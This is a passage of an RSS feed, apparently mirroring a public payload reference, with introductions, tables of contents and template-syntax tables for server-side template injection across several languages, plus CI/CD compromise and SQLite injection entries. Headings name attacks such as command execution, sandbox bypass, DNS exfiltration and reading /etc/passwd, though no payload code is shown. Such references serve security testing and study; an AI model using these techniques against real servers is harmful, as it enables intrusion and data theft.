&lt;li&gt;&lt;a href="#groovy---command-execution-with-obfuscation"&gt;Groovy - Command Execution with Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#groovy---sandbox-bypass"&gt;Groovy - Sandbox Bypass&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#spring-expression-language"&gt;Spring Expression Language&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#spel---basic-injection"&gt;SpEL - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#spel---retrieve-environment-variables"&gt;SpEL - Retrieve Environment Variables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#spel---retrieve-etcpasswd"&gt;SpEL - Retrieve /etc/passwd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#spel---dns-exfiltration"&gt;SpEL - DNS Exfiltration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#spel---session-attributes"&gt;SpEL - Session Attributes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#spel---command-execution"&gt;SpEL - Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#object-graph-navigation-language"&gt;Object-Graph Navigation Language&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#ognl---basic-injection"&gt;OGNL - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ognl---command-execution"&gt;OGNL - Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="templating-libraries" class="anchored-heading"&gt;Templating Libraries&lt;a class="heading-anchor" href="#templating-libraries" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Template Name&lt;/th&gt;
 &lt;th&gt;Payload Format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Codepen&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;#{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Freemarker&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;${ }&lt;/code&gt;, &lt;code&gt;#{ }&lt;/code&gt;, &lt;code&gt;[= ]&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Groovy&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;${ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Jinjava&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Pebble&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SpEL&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;*{ }&lt;/code&gt;, &lt;code&gt;#{ }&lt;/code&gt;, &lt;code&gt;${ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Thymeleaf&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;[[ ]]&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Velocity&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;#set($X=&amp;quot;&amp;quot;) $X&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="java-el" class="anchored-heading"&gt;Java EL&lt;a class="heading-anchor" href="#java-el" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="java-el---basic-injection" class="anchored-heading"&gt;Java EL - Basic Injection&lt;a class="heading-anchor" href="#java-el---basic-injection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Java has multiple Expression Languages using similar syntax.&lt;/p&gt;</description></item><item><title>Server Side Template Injection - JavaScript</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/javascript/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/javascript/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) occurs when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In the context of JavaScript, SSTI vulnerabilities can arise when using server-side templating engines like Handlebars, EJS, or Pug, where user input is integrated into templates without adequate sanitization.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#templating-libraries"&gt;Templating Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#universal-payloads"&gt;Universal Payloads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#handlebars"&gt;Handlebars&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#handlebars---basic-injection"&gt;Handlebars - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#handlebars---command-execution"&gt;Handlebars - Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#lodash"&gt;Lodash&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#lodash---basic-injection"&gt;Lodash - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lodash---command-execution"&gt;Lodash - Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#pug"&gt;Pug&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="templating-libraries" class="anchored-heading"&gt;Templating Libraries&lt;a class="heading-anchor" href="#templating-libraries" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Template Name&lt;/th&gt;
 &lt;th&gt;Payload Format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;DotJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{= }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DustJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;EJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;% %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;HandlebarsJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;HoganJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Lodash&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{= }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;MustacheJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;NunjucksJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;PugJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;#{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;TwigJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;UnderscoreJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;% %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;VelocityJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;#=set($X=&amp;quot;&amp;quot;)$X&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;VueJS&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="universal-payloads" class="anchored-heading"&gt;Universal Payloads&lt;a class="heading-anchor" href="#universal-payloads" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Generic code injection payloads work for many NodeJS-based template engines, such as DotJS, EJS, PugJS, UnderscoreJS and Eta.&lt;/p&gt;</description></item><item><title>Server Side Template Injection - PHP</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/php/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/php/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) is a vulnerability that occurs when an attacker can inject malicious input into a server-side template, causing the template engine to execute arbitrary commands on the server. In PHP, SSTI can arise when user input is embedded within templates rendered by templating engines like Smarty, Twig, or even within plain PHP templates, without proper sanitization or validation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#templating-libraries"&gt;Templating Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#universal-payloads"&gt;Universal Payloads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#blade"&gt;Blade&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#smarty"&gt;Smarty&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#smarty---code-execution-with-obfuscation"&gt;Smarty - Code Execution with Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#twig"&gt;Twig&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#twig---basic-injection"&gt;Twig - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#twig---template-format"&gt;Twig - Template Format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#twig---arbitrary-file-reading"&gt;Twig - Arbitrary File Reading&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#twig---code-execution"&gt;Twig - Code Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#twig---code-execution-with-obfuscation"&gt;Twig - Code Execution with Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#latte"&gt;Latte&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#latte---basic-injection"&gt;Latte - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#latte---code-execution"&gt;Latte - Code Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#pattemplate"&gt;patTemplate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#phplib-and-html_template_phplib"&gt;PHPlib&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#plates"&gt;Plates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="templating-libraries" class="anchored-heading"&gt;Templating Libraries&lt;a class="heading-anchor" href="#templating-libraries" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Template Name&lt;/th&gt;
 &lt;th&gt;Payload Format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Blade (Laravel)&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Latte&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Mustache&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Plates&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;?= ?&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Smarty&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Twig&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="universal-payloads" class="anchored-heading"&gt;Universal Payloads&lt;a class="heading-anchor" href="#universal-payloads" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Generic code injection payloads work for many PHP-based template engines, such as Blade, Latte and Smarty.&lt;/p&gt;</description></item><item><title>Server Side Template Injection - Python</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/python/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/python/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious input into a server-side template, causing arbitrary code execution on the server. In Python, SSTI can occur when using templating engines such as Jinja2, Mako, or Django templates, where user input is included in templates without proper sanitization.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#templating-libraries"&gt;Templating Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#universal-payloads"&gt;Universal Payloads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#django"&gt;Django&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#django---basic-injection"&gt;Django - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#django---cross-site-scripting"&gt;Django - Cross-Site Scripting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#django---debug-information-leak"&gt;Django - Debug Information Leak&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#django---leaking-apps-secret-key"&gt;Django - Leaking App&amp;rsquo;s Secret Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#django---admin-site-url-leak"&gt;Django - Admin Site URL leak&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#django---admin-username-and-password-hash-leak"&gt;Django - Admin Username and Password Hash Leak&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2"&gt;Jinja2&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#jinja2---basic-injection"&gt;Jinja2 - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---template-format"&gt;Jinja2 - Template Format&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---debug-statement"&gt;Jinja2 - Debug Statement&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---dump-all-used-classes"&gt;Jinja2 - Dump All Used Classes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---dump-all-config-variables"&gt;Jinja2 - Dump All Config Variables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---read-remote-file"&gt;Jinja2 - Read Remote File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---write-into-remote-file"&gt;Jinja2 - Write Into Remote File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---remote-command-execution"&gt;Jinja2 - Remote Command Execution&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#jinja2---forcing-output-on-blind-rce"&gt;Forcing Output On Blind RCE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploit-the-ssti-by-calling-ospopenread"&gt;Exploit The SSTI By Calling os.popen().read()&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploit-the-ssti-by-calling-subprocesspopen"&gt;Exploit The SSTI By Calling subprocess.Popen&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploit-the-ssti-by-calling-popen-without-guessing-the-offset"&gt;Exploit The SSTI By Calling Popen Without Guessing The Offset&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploit-the-ssti-by-writing-an-evil-config-file"&gt;Exploit The SSTI By Writing an Evil Config File&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---remote-command-execution-with-obfuscation"&gt;Jinja2 - Remote Command Execution with Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#jinja2---filter-bypass"&gt;Jinja2 - Filter Bypass&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#tornado"&gt;Tornado&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tornado---basic-injection"&gt;Tornado - Basic Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#tornado---remote-command-execution"&gt;Tornado - Remote Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mako"&gt;Mako&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#mako---remote-command-execution"&gt;Mako - Remote Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mako---remote-command-execution-with-obfuscation"&gt;Mako - Remote Command Execution with Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="templating-libraries" class="anchored-heading"&gt;Templating Libraries&lt;a class="heading-anchor" href="#templating-libraries" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Template Name&lt;/th&gt;
 &lt;th&gt;Payload Format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Bottle&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Chameleon&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;${ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Cheetah&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;${ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Django&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Jinja2&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Mako&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;${ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Pystache&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Tornado&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="universal-payloads" class="anchored-heading"&gt;Universal Payloads&lt;a class="heading-anchor" href="#universal-payloads" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Generic code injection payloads work for many Python-based template engines, such as Bottle, Chameleon, Cheetah, Mako and Tornado.&lt;/p&gt;</description></item><item><title>Server Side Template Injection - Ruby</title><link>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/ruby/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/server-side-template-injection/ruby/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#templating-libraries"&gt;Templating Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#universal-payloads"&gt;Universal Payloads&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ruby"&gt;Ruby&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#ruby---basic-injections"&gt;Ruby - Basic injections&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ruby---retrieve-etcpasswd"&gt;Ruby - Retrieve /etc/passwd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ruby---list-files-and-directories"&gt;Ruby - List files and directories&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ruby---remote-command-execution"&gt;Ruby - Remote Command execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="templating-libraries" class="anchored-heading"&gt;Templating Libraries&lt;a class="heading-anchor" href="#templating-libraries" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Template Name&lt;/th&gt;
 &lt;th&gt;Payload Format&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Erb&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Erubi&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Erubis&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;HAML&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;#{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Liquid&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Mustache&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{{ }}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Slim&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;#{ }&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="universal-payloads" class="anchored-heading"&gt;Universal Payloads&lt;a class="heading-anchor" href="#universal-payloads" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Generic code injection payloads work for many Ruby-based template engines, such as Erb, Erubi, Erubis, HAML and Slim.&lt;/p&gt;</description></item><item><title>Source Code Management &amp; CI/CD Compromise</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/source-code-management/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/source-code-management/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/"&gt;InternalAllTheThings/cheatsheets/source-code-management-ci&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://bokkapig.pages.dev/refs/internal/devops/"&gt;CI/CD Attacks&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-azure-devops/"&gt;Azure DevOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-buildkite/"&gt;BuildKite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-circle-ci/"&gt;CircleCI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-drone-ci/"&gt;Drone CI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-github-actions/"&gt;GitHub Actions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-gitlab-ci/"&gt;Gitlab CI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/package-managers/"&gt;Package Managers and Build Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/devops/secrets-enumeration/"&gt;Hardcoded Secrets Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>SQLite Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/sqlite-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/sqlite-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or &amp;ldquo;inject&amp;rdquo; malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
